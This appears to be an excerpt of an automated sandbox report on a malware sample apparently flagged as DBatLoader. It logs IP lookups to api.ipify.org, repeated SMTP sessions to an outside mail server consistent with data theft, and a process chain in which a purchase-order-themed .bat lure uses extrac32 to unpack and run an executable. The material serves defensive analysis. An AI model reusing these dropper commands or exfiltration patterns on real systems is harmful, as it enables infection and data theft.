                                                                                                            2024-11-21 16:00:14 UTC16384INData Raw: 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70
                                                                                                            Data Ascii: KWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisrip


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.1049742104.26.13.2054436424C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-21 16:00:26 UTC155OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                            Host: api.ipify.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-21 16:00:26 UTC399INHTTP/1.1 200 OK
                                                                                                            Date: Thu, 21 Nov 2024 16:00:26 GMT
                                                                                                            Content-Type: text/plain
                                                                                                            Content-Length: 11
                                                                                                            Connection: close
                                                                                                            Vary: Origin
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e61e4846992435d-EWR
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1843&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1650650&cwnd=128&unsent_bytes=0&cid=d41eb0a1c3e2c7b1&ts=487&x=0"
                                                                                                            2024-11-21 16:00:26 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                                                                            Data Ascii: 8.46.123.75


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.1049775104.26.13.2054435072C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-21 16:00:37 UTC155OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                            Host: api.ipify.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-21 16:00:38 UTC399INHTTP/1.1 200 OK
                                                                                                            Date: Thu, 21 Nov 2024 16:00:38 GMT
                                                                                                            Content-Type: text/plain
                                                                                                            Content-Length: 11
                                                                                                            Connection: close
                                                                                                            Vary: Origin
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e61e4ce9dec8cda-EWR
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1845&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1554845&cwnd=239&unsent_bytes=0&cid=32fe294915e78a2b&ts=492&x=0"
                                                                                                            2024-11-21 16:00:38 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                                                                            Data Ascii: 8.46.123.75


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.1049797104.26.13.2054436344C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-21 16:00:48 UTC155OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                            Host: api.ipify.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-21 16:00:48 UTC399INHTTP/1.1 200 OK
                                                                                                            Date: Thu, 21 Nov 2024 16:00:48 GMT
                                                                                                            Content-Type: text/plain
                                                                                                            Content-Length: 11
                                                                                                            Connection: close
                                                                                                            Vary: Origin
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e61e50ec8771a44-EWR
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1892&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1590413&cwnd=114&unsent_bytes=0&cid=fb58b9ee5743e1f8&ts=560&x=0"
                                                                                                            2024-11-21 16:00:48 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                                                                            Data Ascii: 8.46.123.75


                                                                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                            Nov 21, 2024 17:00:29.846848965 CET5874974951.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:00:29 +0000
                                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                                            220 and/or bulk e-mail.
                                                                                                            Nov 21, 2024 17:00:29.847146034 CET49749587192.168.2.1051.195.88.199EHLO 724471
                                                                                                            Nov 21, 2024 17:00:30.271219969 CET5874974951.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 724471 [8.46.123.75]
                                                                                                            250-SIZE 52428800
                                                                                                            250-8BITMIME
                                                                                                            250-PIPELINING
                                                                                                            250-PIPECONNECT
                                                                                                            250-STARTTLS
                                                                                                            250 HELP
                                                                                                            Nov 21, 2024 17:00:30.271703959 CET49749587192.168.2.1051.195.88.199STARTTLS
                                                                                                            Nov 21, 2024 17:00:30.701157093 CET5874974951.195.88.199192.168.2.10220 TLS go ahead
                                                                                                            Nov 21, 2024 17:00:41.179049969 CET5874978151.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:00:40 +0000
                                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                                            220 and/or bulk e-mail.
                                                                                                            Nov 21, 2024 17:00:41.179328918 CET49781587192.168.2.1051.195.88.199EHLO 724471
                                                                                                            Nov 21, 2024 17:00:41.592478991 CET5874978151.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 724471 [8.46.123.75]
                                                                                                            250-SIZE 52428800
                                                                                                            250-8BITMIME
                                                                                                            250-PIPELINING
                                                                                                            250-PIPECONNECT
                                                                                                            250-STARTTLS
                                                                                                            250 HELP
                                                                                                            Nov 21, 2024 17:00:41.592700958 CET49781587192.168.2.1051.195.88.199STARTTLS
                                                                                                            Nov 21, 2024 17:00:42.005294085 CET5874978151.195.88.199192.168.2.10220 TLS go ahead
                                                                                                            Nov 21, 2024 17:00:48.580899000 CET5874979851.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:00:48 +0000
                                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                                            220 and/or bulk e-mail.
                                                                                                            Nov 21, 2024 17:00:48.581091881 CET49798587192.168.2.1051.195.88.199EHLO 724471
                                                                                                            Nov 21, 2024 17:00:48.993161917 CET5874979851.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 724471 [8.46.123.75]
                                                                                                            250-SIZE 52428800
                                                                                                            250-8BITMIME
                                                                                                            250-PIPELINING
                                                                                                            250-PIPECONNECT
                                                                                                            250-STARTTLS
                                                                                                            250 HELP
                                                                                                            Nov 21, 2024 17:00:48.993350983 CET49798587192.168.2.1051.195.88.199STARTTLS
                                                                                                            Nov 21, 2024 17:00:49.443989992 CET5874979851.195.88.199192.168.2.10220 TLS go ahead
                                                                                                            Nov 21, 2024 17:00:51.408502102 CET5874980451.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:00:51 +0000
                                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                                            220 and/or bulk e-mail.
                                                                                                            Nov 21, 2024 17:00:51.408782959 CET49804587192.168.2.1051.195.88.199EHLO 724471
                                                                                                            Nov 21, 2024 17:00:51.821098089 CET5874980451.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 724471 [8.46.123.75]
                                                                                                            250-SIZE 52428800
                                                                                                            250-8BITMIME
                                                                                                            250-PIPELINING
                                                                                                            250-PIPECONNECT
                                                                                                            250-STARTTLS
                                                                                                            250 HELP
                                                                                                            Nov 21, 2024 17:00:51.821510077 CET49804587192.168.2.1051.195.88.199STARTTLS
                                                                                                            Nov 21, 2024 17:00:52.238437891 CET5874980451.195.88.199192.168.2.10220 TLS go ahead
                                                                                                            Nov 21, 2024 17:00:58.304411888 CET5874981951.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:00:58 +0000
                                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                                            220 and/or bulk e-mail.
                                                                                                            Nov 21, 2024 17:00:58.304702997 CET49819587192.168.2.1051.195.88.199EHLO 724471
                                                                                                            Nov 21, 2024 17:00:58.749177933 CET5874981951.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 724471 [8.46.123.75]
                                                                                                            250-SIZE 52428800
                                                                                                            250-8BITMIME
                                                                                                            250-PIPELINING
                                                                                                            250-PIPECONNECT
                                                                                                            250-STARTTLS
                                                                                                            250 HELP
                                                                                                            Nov 21, 2024 17:00:58.749380112 CET49819587192.168.2.1051.195.88.199STARTTLS
                                                                                                            Nov 21, 2024 17:00:59.170792103 CET5874981951.195.88.199192.168.2.10220 TLS go ahead
                                                                                                            Nov 21, 2024 17:02:26.141112089 CET5874998351.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:02:25 +0000
                                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                                            220 and/or bulk e-mail.
                                                                                                            Nov 21, 2024 17:02:26.141349077 CET49983587192.168.2.1051.195.88.199EHLO 724471
                                                                                                            Nov 21, 2024 17:02:26.560761929 CET5874998351.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 724471 [8.46.123.75]
                                                                                                            250-SIZE 52428800
                                                                                                            250-8BITMIME
                                                                                                            250-PIPELINING
                                                                                                            250-PIPECONNECT
                                                                                                            250-STARTTLS
                                                                                                            250 HELP
                                                                                                            Nov 21, 2024 17:02:26.560919046 CET49983587192.168.2.1051.195.88.199STARTTLS
                                                                                                            Nov 21, 2024 17:02:26.982738972 CET5874998351.195.88.199192.168.2.10220 TLS go ahead
                                                                                                            Nov 21, 2024 17:02:45.843790054 CET5874998451.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:02:45 +0000
                                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                                            220 and/or bulk e-mail.
                                                                                                            Nov 21, 2024 17:02:45.845877886 CET49984587192.168.2.1051.195.88.199EHLO 724471
                                                                                                            Nov 21, 2024 17:02:46.245250940 CET5874998451.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 724471 [8.46.123.75]
                                                                                                            250-SIZE 52428800
                                                                                                            250-8BITMIME
                                                                                                            250-PIPELINING
                                                                                                            250-PIPECONNECT
                                                                                                            250-STARTTLS
                                                                                                            250 HELP
                                                                                                            Nov 21, 2024 17:02:46.245512962 CET49984587192.168.2.1051.195.88.199STARTTLS
                                                                                                            Nov 21, 2024 17:02:46.650758982 CET5874998451.195.88.199192.168.2.10220 TLS go ahead
                                                                                                            Nov 21, 2024 17:02:57.128953934 CET5874998551.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:02:56 +0000
                                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                                            220 and/or bulk e-mail.
                                                                                                            Nov 21, 2024 17:02:57.129121065 CET49985587192.168.2.1051.195.88.199EHLO 724471
                                                                                                            Nov 21, 2024 17:02:57.539310932 CET5874998551.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 724471 [8.46.123.75]
                                                                                                            250-SIZE 52428800
                                                                                                            250-8BITMIME
                                                                                                            250-PIPELINING
                                                                                                            250-PIPECONNECT
                                                                                                            250-STARTTLS
                                                                                                            250 HELP
                                                                                                            Nov 21, 2024 17:02:57.539520025 CET49985587192.168.2.1051.195.88.199STARTTLS
                                                                                                            Nov 21, 2024 17:02:57.542956114 CET5874998651.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:02:57 +0000
                                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                                            220 and/or bulk e-mail.
                                                                                                            Nov 21, 2024 17:02:57.543157101 CET49986587192.168.2.1051.195.88.199EHLO 724471
                                                                                                            Nov 21, 2024 17:02:57.944479942 CET5874998651.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 724471 [8.46.123.75]
                                                                                                            250-SIZE 52428800
                                                                                                            250-8BITMIME
                                                                                                            250-PIPELINING
                                                                                                            250-PIPECONNECT
                                                                                                            250-STARTTLS
                                                                                                            250 HELP
                                                                                                            Nov 21, 2024 17:02:57.945343971 CET49986587192.168.2.1051.195.88.199STARTTLS
                                                                                                            Nov 21, 2024 17:02:57.951304913 CET5874998551.195.88.199192.168.2.10220 TLS go ahead
                                                                                                            Nov 21, 2024 17:02:58.346807003 CET5874998651.195.88.199192.168.2.10220 TLS go ahead
                                                                                                            Nov 21, 2024 17:03:06.909136057 CET5874998751.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:03:06 +0000
                                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                                            220 and/or bulk e-mail.
                                                                                                            Nov 21, 2024 17:03:06.909249067 CET49987587192.168.2.1051.195.88.199EHLO 724471
                                                                                                            Nov 21, 2024 17:03:07.324314117 CET5874998751.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 724471 [8.46.123.75]
                                                                                                            250-SIZE 52428800
                                                                                                            250-8BITMIME
                                                                                                            250-PIPELINING
                                                                                                            250-PIPECONNECT
                                                                                                            250-STARTTLS
                                                                                                            250 HELP
                                                                                                            Nov 21, 2024 17:03:07.324490070 CET49987587192.168.2.1051.195.88.199STARTTLS
                                                                                                            Nov 21, 2024 17:03:07.739378929 CET5874998751.195.88.199192.168.2.10220 TLS go ahead
                                                                                                            Nov 21, 2024 17:03:14.600337982 CET5874998851.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:03:14 +0000
                                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                                            220 and/or bulk e-mail.
                                                                                                            Nov 21, 2024 17:03:14.602309942 CET49988587192.168.2.1051.195.88.199EHLO 724471
                                                                                                            Nov 21, 2024 17:03:15.084573984 CET5874998851.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 724471 [8.46.123.75]
                                                                                                            250-SIZE 52428800
                                                                                                            250-8BITMIME
                                                                                                            250-PIPELINING
                                                                                                            250-PIPECONNECT
                                                                                                            250-STARTTLS
                                                                                                            250 HELP
                                                                                                            Nov 21, 2024 17:03:15.087930918 CET49988587192.168.2.1051.195.88.199STARTTLS
                                                                                                            Nov 21, 2024 17:03:15.522279978 CET5874998851.195.88.199192.168.2.10220 TLS go ahead
                                                                                                            Nov 21, 2024 17:03:17.592255116 CET5874998951.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:03:17 +0000
                                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                                            220 and/or bulk e-mail.
                                                                                                            Nov 21, 2024 17:03:17.592413902 CET49989587192.168.2.1051.195.88.199EHLO 724471
                                                                                                            Nov 21, 2024 17:03:18.002196074 CET5874998951.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 724471 [8.46.123.75]
                                                                                                            250-SIZE 52428800
                                                                                                            250-8BITMIME
                                                                                                            250-PIPELINING
                                                                                                            250-PIPECONNECT
                                                                                                            250-STARTTLS
                                                                                                            250 HELP
                                                                                                            Nov 21, 2024 17:03:18.002374887 CET49989587192.168.2.1051.195.88.199STARTTLS
                                                                                                            Nov 21, 2024 17:03:18.413007021 CET5874998951.195.88.199192.168.2.10220 TLS go ahead
                                                                                                            Nov 21, 2024 17:03:30.492500067 CET5874999051.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:03:30 +0000
                                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                                            220 and/or bulk e-mail.
                                                                                                            Nov 21, 2024 17:03:30.492811918 CET49990587192.168.2.1051.195.88.199EHLO 724471
                                                                                                            Nov 21, 2024 17:03:30.905002117 CET5874999051.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 724471 [8.46.123.75]
                                                                                                            250-SIZE 52428800
                                                                                                            250-8BITMIME
                                                                                                            250-PIPELINING
                                                                                                            250-PIPECONNECT
                                                                                                            250-STARTTLS
                                                                                                            250 HELP
                                                                                                            Nov 21, 2024 17:03:30.905433893 CET49990587192.168.2.1051.195.88.199STARTTLS
                                                                                                            Nov 21, 2024 17:03:31.348866940 CET5874999051.195.88.199192.168.2.10220 TLS go ahead
                                                                                                            Nov 21, 2024 17:03:33.816375017 CET5874999151.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:03:33 +0000
                                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                                            220 and/or bulk e-mail.
                                                                                                            Nov 21, 2024 17:03:33.816545010 CET49991587192.168.2.1051.195.88.199EHLO 724471
                                                                                                            Nov 21, 2024 17:03:34.225655079 CET5874999151.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 724471 [8.46.123.75]
                                                                                                            250-SIZE 52428800
                                                                                                            250-8BITMIME
                                                                                                            250-PIPELINING
                                                                                                            250-PIPECONNECT
                                                                                                            250-STARTTLS
                                                                                                            250 HELP
                                                                                                            Nov 21, 2024 17:03:34.225812912 CET49991587192.168.2.1051.195.88.199STARTTLS
                                                                                                            Nov 21, 2024 17:03:34.634048939 CET5874999151.195.88.199192.168.2.10220 TLS go ahead
                                                                                                            Nov 21, 2024 17:03:35.988289118 CET5874999251.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:03:35 +0000
                                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                                            220 and/or bulk e-mail.
                                                                                                            Nov 21, 2024 17:03:35.988452911 CET49992587192.168.2.1051.195.88.199EHLO 724471
                                                                                                            Nov 21, 2024 17:03:36.409637928 CET5874999251.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 724471 [8.46.123.75]
                                                                                                            250-SIZE 52428800
                                                                                                            250-8BITMIME
                                                                                                            250-PIPELINING
                                                                                                            250-PIPECONNECT
                                                                                                            250-STARTTLS
                                                                                                            250 HELP
                                                                                                            Nov 21, 2024 17:03:36.409751892 CET49992587192.168.2.1051.195.88.199STARTTLS
                                                                                                            Nov 21, 2024 17:03:36.818676949 CET5874999251.195.88.199192.168.2.10220 TLS go ahead
                                                                                                            Nov 21, 2024 17:03:38.361756086 CET5874999351.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:03:38 +0000
                                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                                            220 and/or bulk e-mail.
                                                                                                            Nov 21, 2024 17:03:38.361922979 CET49993587192.168.2.1051.195.88.199EHLO 724471
                                                                                                            Nov 21, 2024 17:03:38.780723095 CET5874999351.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 724471 [8.46.123.75]
                                                                                                            250-SIZE 52428800
                                                                                                            250-8BITMIME
                                                                                                            250-PIPELINING
                                                                                                            250-PIPECONNECT
                                                                                                            250-STARTTLS
                                                                                                            250 HELP
                                                                                                            Nov 21, 2024 17:03:38.781373024 CET49993587192.168.2.1051.195.88.199STARTTLS
                                                                                                            Nov 21, 2024 17:03:39.205532074 CET5874999351.195.88.199192.168.2.10220 TLS go ahead
                                                                                                            Nov 21, 2024 17:03:46.119208097 CET5874999451.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:03:45 +0000
                                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                                            220 and/or bulk e-mail.
                                                                                                            Nov 21, 2024 17:03:46.119364977 CET49994587192.168.2.1051.195.88.199EHLO 724471
                                                                                                            Nov 21, 2024 17:03:46.529697895 CET5874999451.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 724471 [8.46.123.75]
                                                                                                            250-SIZE 52428800
                                                                                                            250-8BITMIME
                                                                                                            250-PIPELINING
                                                                                                            250-PIPECONNECT
                                                                                                            250-STARTTLS
                                                                                                            250 HELP
                                                                                                            Nov 21, 2024 17:03:46.529927969 CET49994587192.168.2.1051.195.88.199STARTTLS
                                                                                                            Nov 21, 2024 17:03:46.957148075 CET5874999451.195.88.199192.168.2.10220 TLS go ahead
                                                                                                            Nov 21, 2024 17:04:06.795191050 CET5874999551.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:04:06 +0000
                                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                                            220 and/or bulk e-mail.
                                                                                                            Nov 21, 2024 17:04:06.795577049 CET49995587192.168.2.1051.195.88.199EHLO 724471
                                                                                                            Nov 21, 2024 17:04:07.200015068 CET5874999551.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 724471 [8.46.123.75]
                                                                                                            250-SIZE 52428800
                                                                                                            250-8BITMIME
                                                                                                            250-PIPELINING
                                                                                                            250-PIPECONNECT
                                                                                                            250-STARTTLS
                                                                                                            250 HELP
                                                                                                            Nov 21, 2024 17:04:07.200716019 CET49995587192.168.2.1051.195.88.199STARTTLS
                                                                                                            Nov 21, 2024 17:04:07.603255033 CET5874999551.195.88.199192.168.2.10220 TLS go ahead
                                                                                                            Nov 21, 2024 17:04:13.969471931 CET5874999651.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:04:13 +0000
                                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                                            220 and/or bulk e-mail.
                                                                                                            Nov 21, 2024 17:04:13.969623089 CET49996587192.168.2.1051.195.88.199EHLO 724471
                                                                                                            Nov 21, 2024 17:04:14.387814045 CET5874999651.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 724471 [8.46.123.75]
                                                                                                            250-SIZE 52428800
                                                                                                            250-8BITMIME
                                                                                                            250-PIPELINING
                                                                                                            250-PIPECONNECT
                                                                                                            250-STARTTLS
                                                                                                            250 HELP
                                                                                                            Nov 21, 2024 17:04:14.388119936 CET49996587192.168.2.1051.195.88.199STARTTLS
                                                                                                            Nov 21, 2024 17:04:14.806406021 CET5874999651.195.88.199192.168.2.10220 TLS go ahead
                                                                                                            Nov 21, 2024 17:04:23.719291925 CET5874999751.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:04:23 +0000
                                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                                            220 and/or bulk e-mail.
                                                                                                            Nov 21, 2024 17:04:23.719635010 CET49997587192.168.2.1051.195.88.199EHLO 724471
                                                                                                            Nov 21, 2024 17:04:24.137075901 CET5874999751.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 724471 [8.46.123.75]
                                                                                                            250-SIZE 52428800
                                                                                                            250-8BITMIME
                                                                                                            250-PIPELINING
                                                                                                            250-PIPECONNECT
                                                                                                            250-STARTTLS
                                                                                                            250 HELP
                                                                                                            Nov 21, 2024 17:04:24.137295008 CET49997587192.168.2.1051.195.88.199STARTTLS
                                                                                                            Nov 21, 2024 17:04:24.556061983 CET5874999751.195.88.199192.168.2.10220 TLS go ahead
                                                                                                            Nov 21, 2024 17:04:24.732275963 CET5874999851.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:04:24 +0000
                                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                                            220 and/or bulk e-mail.
                                                                                                            Nov 21, 2024 17:04:24.732393026 CET49998587192.168.2.1051.195.88.199EHLO 724471
                                                                                                            Nov 21, 2024 17:04:25.147684097 CET5874999851.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 724471 [8.46.123.75]
                                                                                                            250-SIZE 52428800
                                                                                                            250-8BITMIME
                                                                                                            250-PIPELINING
                                                                                                            250-PIPECONNECT
                                                                                                            250-STARTTLS
                                                                                                            250 HELP

                                                                                                            Click to jump to process

                                                                                                            Click to jump to process

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Click to jump to process

                                                                                                            Target ID:0
                                                                                                            Start time:11:00:08
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" "
                                                                                                            Imagebase:0x7ff77f040000
                                                                                                            File size:289'792 bytes
                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:1
                                                                                                            Start time:11:00:08
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff620390000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:3
                                                                                                            Start time:11:00:08
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Windows\System32\extrac32.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:extrac32 /y "C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" "C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                                            Imagebase:0x7ff702720000
                                                                                                            File size:35'328 bytes
                                                                                                            MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            Target ID:4
                                                                                                            Start time:11:00:09
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:1'392'640 bytes
                                                                                                            MD5 hash:67DAC6AE9EE770115DB85CC71979DC41
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:Borland Delphi
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.1329954497.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Avira
                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            • Detection: 29%, ReversingLabs
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:6
                                                                                                            Start time:11:00:20
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
                                                                                                            Imagebase:0xd70000
                                                                                                            File size:236'544 bytes
                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
